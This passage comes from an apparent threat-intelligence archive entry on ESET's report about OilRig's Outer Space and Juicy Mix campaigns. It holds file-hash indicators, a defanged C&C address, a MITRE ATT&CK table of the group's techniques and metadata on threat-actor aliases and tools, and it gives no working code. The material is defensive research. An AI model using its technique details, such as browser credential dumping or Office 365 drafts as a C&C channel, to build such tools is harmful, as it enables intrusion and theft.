The group deploys a set of custom post-compromise tools\r\nthat are used to collect credentials, cookies, and browsing history from major browsers and from the Windows Credential\r\nManager. Despite these innovations, OilRig also continues to rely on established ways to obtain user data.\r\nFor any inquiries about our research published on WeLiveSecurity, please contact us at threatintel@eset.com.\r\nESET Research offers private APT intelligence reports and data feeds. For any inquiries about this service, visit\r\nthe ESET Threat Intelligence page.\r\nIoCs\r\nFiles\r\nSHA-1 | Filename | ESET detection name | Description\r\n3D71D782B95F13EE69E96BCF73EE279A00EAE5DB | MyCV.doc | VBA/OilRig.C | Document with malicious macro dropping Mango.\r\n3699B67BF4E381847BF98528F8CE2B966231F01A | chrome_log.vbs | VBS/TrojanDropper.Agent.PCC | VBS dropper.\r\n1DE4810A10FA2D73CC589CA403A4390B02C6DA5E | Solar.exe | MSIL/OilRig.E | Solar backdoor.\r\nCB26EBDE498ECD2D7CBF1BC498E1BCBB2619A96C | Mango.exe | MSIL/OilRig.E | Mango backdoor (v1.0.0).\r\nC9D18D01E1EC96BE952A9D7BD78F6BBB4DD2AA2A | Menorah.exe | MSIL/OilRig.E | Mango backdoor (v1.1.1).\r\n83419CBA55C898FDBE19DFAFB5B1B207CC443190 | EdgeUpdater.exe | MSIL/PSW.Agent.SXJ | Edge data dumper.\r\nDB01095AFEF88138C9ED3847B5D8AF954ED7BBBC | Gr.exe | MSIL/PSW.Agent.SXJ | Chrome data dumper.\r\nBE01C95C2B5717F39B550EA20F280D69C0C05894 | ieupdater.exe | PowerShell/PSW.Agent.AH | Windows Credential Manager dumper.\r\n6A1BA65C9FD8CC9DCB0657977DB2B03DACDD8A2A | mkc.exe | Win64/PSW.Agent.AW | MKG - Chrome data dumper.\r\n94C08A619AF2B08FEF08B131A7A59D115C8C2F7B | mkkc.exe | Win64/PSW.Agent.AW | MKG 
- Chrome data dumper.\r\nCA53B8EB76811C1940D814AAA8FE875003805F51 | cmk.exe | Win64/PSW.Agent.AW | MKG - Chrome data dumper.\r\nBE9B6ACA8A175DF61F2C75932E029F19789FD7E3 | CCXProcess.exe | MSIL/OilRig.A | SC5k downloader (32-bit version).\r\n2236D4DCF68C65A822FF0A2AD48D4DF99761AD07 | acrotray.exe | MSIL/OilRig.D | SC5k downloader (64-bit version).\r\nEA8C3E9F418DCF92412EB01FCDCDC81FDD591BF1 | node.exe | MSIL/OilRig.D | SC5k downloader (64-bit version).\r\nNetwork\r\nIP | Domain | Hosting provider | First seen | Details\r\n199.102.48[.]42 | tecforsc-001-site1.gtempurl[.]com | MarquisNet | 2022-07-29 | N/A\r\nMITRE ATT\u0026CK techniques\r\nThis table was built using version 13 of the MITRE ATT\u0026CK framework.\r\nTactic | ID | Name | Description\r\nResource Development | T1584.004 | Compromise Infrastructure: Server | In both Outer Space and Juicy Mix campaigns, OilRig has compromised legitimate websites to stage malicious tools and for C\u0026C communications.\r\nResource Development | T1587.001 | Develop Capabilities: Malware | OilRig has developed custom backdoors (Solar and Mango), a downloader (SC5k), and a set of credential-theft tools for use in its operations.\r\nResource Development | T1608.001 | Stage Capabilities: Upload Malware | OilRig has uploaded malicious components to its C\u0026C servers, and stored prestaged files and commands in the Drafts email directory of an Office 365 account for SC5k to download and execute.\r\nResource Development | T1608.002 | Stage Capabilities: Upload Tool | OilRig has uploaded malicious tools to its C\u0026C servers, and stored prestaged files in the Drafts email directory of an Office 365 account for SC5k to download and execute.\r\nInitial Access | T1566.001 | Phishing: Spearphishing Attachment | OilRig probably distributed its Outer Space and Juicy Mix campaigns via phishing emails with their VBS droppers attached.\r\nExecution | T1053.005 | Scheduled Task/Job: Scheduled Task | OilRig’s IDumper, EDumper, and CDumper tools use scheduled tasks named ie\u003cuser\u003e, ed\u003cuser\u003e, and cu\u003cuser\u003e to execute themselves under the context of other users. Solar and Mango use a C#/.NET task on a timer to iteratively execute their main functions.\r\nExecution | T1059.001 | Command and Scripting Interpreter: PowerShell | OilRig’s IDumper tool uses PowerShell for execution.\r\nExecution | T1059.003 | Command and Scripting Interpreter: Windows Command Shell | OilRig’s Solar, SC5k, IDumper, EDumper, and CDumper use cmd.exe to execute tasks on the system.\r\nExecution | T1059.005 | Command and Scripting Interpreter: Visual Basic | OilRig uses a malicious VBScript to deliver and persist its Solar and Mango backdoors.\r\nExecution | T1106 | Native API | OilRig’s Mango backdoor uses the CreateProcess Windows API for execution.\r\nPersistence | T1053.005 | Scheduled Task/Job: Scheduled Task | OilRig’s VBS dropper schedules a task named ReminderTask to establish persistence for the Mango backdoor.\r\nDefense Evasion | T1036.005 | Masquerading: Match Legitimate Name or Location | OilRig uses legitimate or innocuous filenames for its malware to disguise itself from defenders and security software.\r\nDefense Evasion | T1027.002 | Obfuscated Files or Information: Software Packing | OilRig has used SAPIEN Script Packager and SmartAssembly obfuscator to obfuscate its IDumper tool.\r\nDefense Evasion | T1027.009 | Obfuscated Files or Information: Embedded Payloads | OilRig’s VBS droppers have malicious payloads embedded within them as a series of base64 substrings.\r\nDefense Evasion | T1036.004 | Masquerading: Masquerade Task or Service | In order to appear legitimate, Mango’s VBS dropper schedules a task with the description Start notepad at a certain time.\r\nDefense Evasion | T1070.009 | Indicator Removal: Clear Persistence | OilRig’s post-compromise tools delete their scheduled tasks after a certain time period.\r\nDefense Evasion | T1140 | Deobfuscate/Decode Files or Information | OilRig uses several obfuscation methods to protect its strings and embedded payloads.\r\nDefense Evasion | T1553 | Subvert Trust Controls | SC5k uses Office 365, generally a trusted third party and often overlooked by defenders, as a download site.\r\nDefense Evasion | T1562 | Impair Defenses | OilRig’s Mango backdoor has an (as yet) unused capability to block endpoint security solutions from loading their user-mode code in specific processes.\r\nCredential Access | T1555.003 | Credentials from Password Stores: Credentials from Web Browsers | OilRig’s custom tools MKG, CDumper, and EDumper can obtain credentials, cookies, and browsing history from Chrome and Edge browsers.\r\nCredential Access | T1555.004 | Credentials from Password Stores: Windows Credential Manager | OilRig’s custom credential dumping tool IDumper can steal credentials from the Windows Credential Manager.\r\nDiscovery | T1082 | System Information Discovery | Mango obtains the compromised computer name.\r\nDiscovery | T1083 | File and Directory Discovery | Mango has a command to enumerate the content of a specified directory.\r\nDiscovery | T1033 | System Owner/User Discovery | Mango obtains the victim’s username.\r\nDiscovery | T1087.001 | Account Discovery: Local Account | OilRig’s EDumper, CDumper, and IDumper tools can enumerate all user accounts on the compromised host.\r\nDiscovery | T1217 | Browser Information Discovery | MKG dumps Chrome history and bookmarks.\r\nCommand and Control | T1071.001 | Application Layer Protocol: Web Protocols | Mango uses HTTP in C\u0026C communications.\r\nCommand and Control | T1105 | Ingress Tool Transfer | Mango has the capability to download additional files from the C\u0026C server for subsequent execution.\r\nCommand and Control | T1001 | Data Obfuscation | Solar and SC5k use a simple XOR-encryption method along with gzip compression to obfuscate data at rest and in transit.\r\nCommand and Control | T1102.002 | Web Service: Bidirectional Communication | SC5k uses Office 365 for downloading files from and uploading files to the Drafts directory in a legitimate email account.\r\nCommand and Control | T1132.001 | Data Encoding: Standard Encoding | Solar, Mango, and MKG base64 encode data before sending it to the C\u0026C server.\r\nCommand and Control | T1573.001 | Encrypted Channel: Symmetric Cryptography | Mango uses an XOR cipher with the key Q\u00264g to encrypt data in C\u0026C communication.\r\nCommand and Control | T1573.002 | Encrypted Channel: Asymmetric Cryptography | Mango uses TLS for C\u0026C communication.\r\nExfiltration | T1041 | Exfiltration Over C2 Channel | Mango, Solar, and SC5k use their C\u0026C channels for exfiltration.\r\nSource: https://www.welivesecurity.com/en/eset-research/oilrigs-outer-space-juicy-mix-same-ol-rig-new-drill-pipes/",
	"extraction_quality": 1,
	"language": "EN",
	"sources": [
		"ETDA",
		"MITRE",
		"Malpedia"
	],
	"references": [
		"https://www.welivesecurity.com/en/eset-research/oilrigs-outer-space-juicy-mix-same-ol-rig-new-drill-pipes/"
	],
	"report_names": [
		"oilrigs-outer-space-juicy-mix-same-ol-rig-new-drill-pipes"
	],
	"threat_actors": [
		{
			"id": "ce10c1bd-4467-45f9-af83-28fc88e35ca4",
			"created_at": "2022-10-25T15:50:23.458833Z",
			"updated_at": "2026-04-10T02:00:05.419537Z",
			"deleted_at": null,
			"main_name": "APT34",
			"aliases": null,
			"source_name": "MITRE:APT34",
			"tools": [
				"netstat",
				"Systeminfo",
				"PsExec",
				"SEASHARPEE",
				"Tasklist",
				"Mimikatz",
				"POWRUNER",
				"certutil"
			],
			"source_id": "MITRE",
			"reports": null
		},
		{
			"id": "cde987a8-c71f-49e2-b761-5b7fa2b4ada6",
			"created_at": "2022-10-25T16:07:23.706646Z",
			"updated_at": "2026-04-10T02:00:04.719127Z",
			"deleted_at": null,
			"main_name": "Hexane",
			"aliases": [
				"ATK 120",
				"Cobalt Lyceum",
				"G1001",
				"Lyceum",
				"Operation Out to Sea",
				"Siamesekitten",
				"Yellow Dev 9"
			],
			"source_name": "ETDA:Hexane",
			"tools": [
				"DanBot",
				"DanDrop",
				"Decrypt-RDCMan.ps1",
				"Get-LAPSP.ps1",
				"James",
				"Milan",
				"kl.ps1"
			],
			"source_id": "ETDA",
			"reports": null
		},
		{
			"id": "cffb3c01-038f-4527-9cfd-57ad5a035c22",
			"created_at": "2022-10-25T15:50:23.38055Z",
			"updated_at": "2026-04-10T02:00:05.258283Z",
			"deleted_at": null,
			"main_name": "OilRig",
			"aliases": [
				"COBALT GYPSY",
				"IRN2",
				"APT34",
				"Helix Kitten",
				"Evasive Serpens",
				"Hazel Sandstorm",
				"EUROPIUM",
				"ITG13",
				"Earth Simnavaz",
				"Crambus",
				"TA452"
			],
			"source_name": "MITRE:OilRig",
			"tools": [
				"ISMInjector",
				"ODAgent",
				"RDAT",
				"Systeminfo",
				"QUADAGENT",
				"OopsIE",
				"ngrok",
				"Tasklist",
				"certutil",
				"ZeroCleare",
				"POWRUNER",
				"netstat",
				"Solar",
				"ipconfig",
				"LaZagne",
				"BONDUPDATER",
				"SideTwist",
				"OilBooster",
				"SampleCheck5000",
				"PsExec",
				"SEASHARPEE",
				"Mimikatz",
				"PowerExchange",
				"OilCheck",
				"RGDoor",
				"ftp"
			],
			"source_id": "MITRE",
			"reports": null
		},
		{
			"id": "a7df240e-6750-4b71-99de-85831b92faa2",
			"created_at": "2022-10-25T15:50:23.859253Z",
			"updated_at": "2026-04-10T02:00:05.285965Z",
			"deleted_at": null,
			"main_name": "HEXANE",
			"aliases": [
				"Lyceum",
				"Siamesekitten",
				"Spirlin"
			],
			"source_name": "MITRE:HEXANE",
			"tools": [
				"Milan",
				"netstat",
				"BITSAdmin",
				"DnsSystem",
				"DanBot",
				"ipconfig",
				"Mimikatz",
				"Kevin",
				"PoshC2"
			],
			"source_id": "MITRE",
			"reports": null
		},
		{
			"id": "8d76e350-dfb5-4733-800d-876de41f690d",
			"created_at": "2023-01-06T13:46:38.841887Z",
			"updated_at": "2026-04-10T02:00:03.119083Z",
			"deleted_at": null,
			"main_name": "DNSpionage",
			"aliases": [
				"COBALT EDGEWATER"
			],
			"source_name": "MISPGALAXY:DNSpionage",
			"tools": [],
			"source_id": "MISPGALAXY",
			"reports": null
		},
		{
			"id": "fb8f3a5f-01a9-498e-9396-52f844424c33",
			"created_at": "2023-01-06T13:46:39.045338Z",
			"updated_at": "2026-04-10T02:00:03.195743Z",
			"deleted_at": null,
			"main_name": "LYCEUM",
			"aliases": [
				"Spirlin",
				"MYSTICDOME",
				"siamesekitten",
				"Chrono Kitten",
				"Storm-0133",
				"COBALT LYCEUM",
				"UNC1530"
			],
			"source_name": "MISPGALAXY:LYCEUM",
			"tools": [],
			"source_id": "MISPGALAXY",
			"reports": null
		},
		{
			"id": "4632103e-8035-4a83-9ecb-c1e12e21288c",
			"created_at": "2022-10-25T16:07:23.542255Z",
			"updated_at": "2026-04-10T02:00:04.64888Z",
			"deleted_at": null,
			"main_name": "DNSpionage",
			"aliases": [],
			"source_name": "ETDA:DNSpionage",
			"tools": [
				"Agent Drable",
				"AgentDrable",
				"CACTUSPIPE",
				"DNSpionage",
				"DropperBackdoor",
				"Karkoff",
				"MailDropper",
				"OILYFACE"
			],
			"source_id": "ETDA",
			"reports": null
		},
		{
			"id": "156b3bc5-14b7-48e1-b19d-23aa17492621",
			"created_at": "2025-08-07T02:03:24.793494Z",
			"updated_at": "2026-04-10T02:00:03.634641Z",
			"deleted_at": null,
			"main_name": "COBALT ULSTER",
			"aliases": [
				"Boggy Serpens ",
				"ENT-11 ",
				"Earth Vetala ",
				"ITG17 ",
				"MERCURY ",
				"Mango Sandstorm ",
				"MuddyWater ",
				"STAC 1171 ",
				"Seedworm ",
				"Static Kitten ",
				"TA450 ",
				"TEMP.Zagros ",
				"UNC3313 ",
				"Yellow Nix "
			],
			"source_name": "Secureworks:COBALT ULSTER",
			"tools": [
				"CrackMapExec",
				"Empire",
				"FORELORD",
				"Koadic",
				"LaZagne",
				"Metasploit",
				"Mimikatz",
				"Plink",
				"PowerStats"
			],
			"source_id": "Secureworks",
			"reports": null
		},
		{
			"id": "386b1b0a-9217-46d4-a0d6-73d6286154e0",
			"created_at": "2025-08-07T02:03:24.760429Z",
			"updated_at": "2026-04-10T02:00:03.619131Z",
			"deleted_at": null,
			"main_name": "COBALT LYCEUM",
			"aliases": [
				"DEV-0133 ",
				"HEXANE ",
				"ScorchedEpoch "
			],
			"source_name": "Secureworks:COBALT LYCEUM",
			"tools": [
				"DanBot",
				"MilanRAT",
				"RGDoor",
				"SharkWork RAT"
			],
			"source_id": "Secureworks",
			"reports": null
		},
		{
			"id": "67b2c161-5a04-4e3d-8ce7-cce457a4a17b",
			"created_at": "2025-08-07T02:03:24.722093Z",
			"updated_at": "2026-04-10T02:00:03.681914Z",
			"deleted_at": null,
			"main_name": "COBALT EDGEWATER",
			"aliases": [
				"APT34 ",
				"Cold River ",
				"DNSpionage "
			],
			"source_name": "Secureworks:COBALT EDGEWATER",
			"tools": [
				"AgentDrable",
				"DNSpionage",
				"Karkoff",
				"MailDropper",
				"SideTwist",
				"TWOTONE"
			],
			"source_id": "Secureworks",
			"reports": null
		},
		{
			"id": "c786e025-c267-40bd-9491-328da70811a5",
			"created_at": "2025-08-07T02:03:24.736817Z",
			"updated_at": "2026-04-10T02:00:03.752071Z",
			"deleted_at": null,
			"main_name": "COBALT GYPSY",
			"aliases": [
				"APT34 ",
				"CHRYSENE ",
				"Crambus ",
				"EUROPIUM ",
				"Hazel Sandstorm ",
				"Helix Kitten ",
				"ITG13 ",
				"OilRig ",
				"Yellow Maero "
			],
			"source_name": "Secureworks:COBALT GYPSY",
			"tools": [
				"Glimpse",
				"Helminth",
				"Jason",
				"MacDownloader",
				"PoisonFrog",
				"RGDoor",
				"ThreeDollars",
				"TinyZbot",
				"Toxocara",
				"Trichuris",
				"TwoFace"
			],
			"source_id": "Secureworks",
			"reports": null
		},
		{
			"id": "67709937-2186-4a32-b64c-a5693d40ac77",
			"created_at": "2023-01-06T13:46:38.495593Z",
			"updated_at": "2026-04-10T02:00:02.999196Z",
			"deleted_at": null,
			"main_name": "OilRig",
			"aliases": [
				"Crambus",
				"Helix Kitten",
				"APT34",
				"IRN2",
				"ATK40",
				"G0049",
				"EUROPIUM",
				"TA452",
				"Twisted Kitten",
				"Cobalt Gypsy",
				"APT 34",
				"Evasive Serpens",
				"Hazel Sandstorm",
				"Earth Simnavaz"
			],
			"source_name": "MISPGALAXY:OilRig",
			"tools": [],
			"source_id": "MISPGALAXY",
			"reports": null
		},
		{
			"id": "b6436f7b-6012-4969-aed1-d440e2e8b238",
			"created_at": "2022-10-25T16:07:23.91517Z",
			"updated_at": "2026-04-10T02:00:04.788408Z",
			"deleted_at": null,
			"main_name": "OilRig",
			"aliases": [
				"APT 34",
				"ATK 40",
				"Chrysene",
				"Cobalt Gypsy",
				"Crambus",
				"DEV-0861",
				"EUROPIUM",
				"Earth Simnavaz",
				"Evasive Serpens",
				"G0049",
				"Hazel Sandstorm",
				"Helix Kitten",
				"IRN2",
				"ITG13",
				"Scarred Manticore",
				"Storm-0861",
				"TA452",
				"Twisted Kitten",
				"UNC1860",
				"Yellow Maero"
			],
			"source_name": "ETDA:OilRig",
			"tools": [
				"AMATIAS",
				"Agent Drable",
				"Agent Injector",
				"AgentDrable",
				"Alma Communicator",
				"BONDUPDATER",
				"CACTUSPIPE",
				"Clayslide",
				"CypherRat",
				"DNSExfitrator",
				"DNSpionage",
				"DROPSHOT",
				"DistTrack",
				"DropperBackdoor",
				"Fox Panel",
				"GREYSTUFF",
				"GoogleDrive RAT",
				"HighShell",
				"HyperShell",
				"ISMAgent",
				"ISMDoor",
				"ISMInjector",
				"Jason",
				"Karkoff",
				"LIONTAIL",
				"LOLBAS",
				"LOLBins",
				"LONGWATCH",
				"LaZagne",
				"Living off the Land",
				"MailDropper",
				"Mimikatz",
				"MrPerfectInstaller",
				"OILYFACE",
				"OopsIE",
				"POWBAT",
				"POWRUNER",
				"Plink",
				"Poison Frog",
				"PowerExchange",
				"PsList",
				"PuTTY Link",
				"QUADAGENT",
				"RDAT",
				"RGDoor",
				"SEASHARPEE",
				"Saitama",
				"Saitama Backdoor",
				"Shamoon",
				"SideTwist",
				"SpyNote",
				"SpyNote RAT",
				"StoneDrill",
				"TONEDEAF",
				"TONEDEAF 2.0",
				"ThreeDollars",
				"TwoFace",
				"VALUEVAULT",
				"Webmask",
				"WinRAR",
				"ZEROCLEAR",
				"ZeroCleare",
				"certutil",
				"certutil.exe"
			],
			"source_id": "ETDA",
			"reports": null
		}
	],
	"ts_created_at": 1775434694,
	"ts_updated_at": 1775792257,
	"ts_creation_date": 0,
	"ts_modification_date": 0,
	"files": {
		"pdf": "https://archive.orkl.eu/5216b4cd9e4cbe88aa3fc04fe3be9081a31ed8b1.pdf",
		"text": "https://archive.orkl.eu/5216b4cd9e4cbe88aa3fc04fe3be9081a31ed8b1.txt",
		"img": "https://archive.orkl.eu/5216b4cd9e4cbe88aa3fc04fe3be9081a31ed8b1.jpg"
	}
}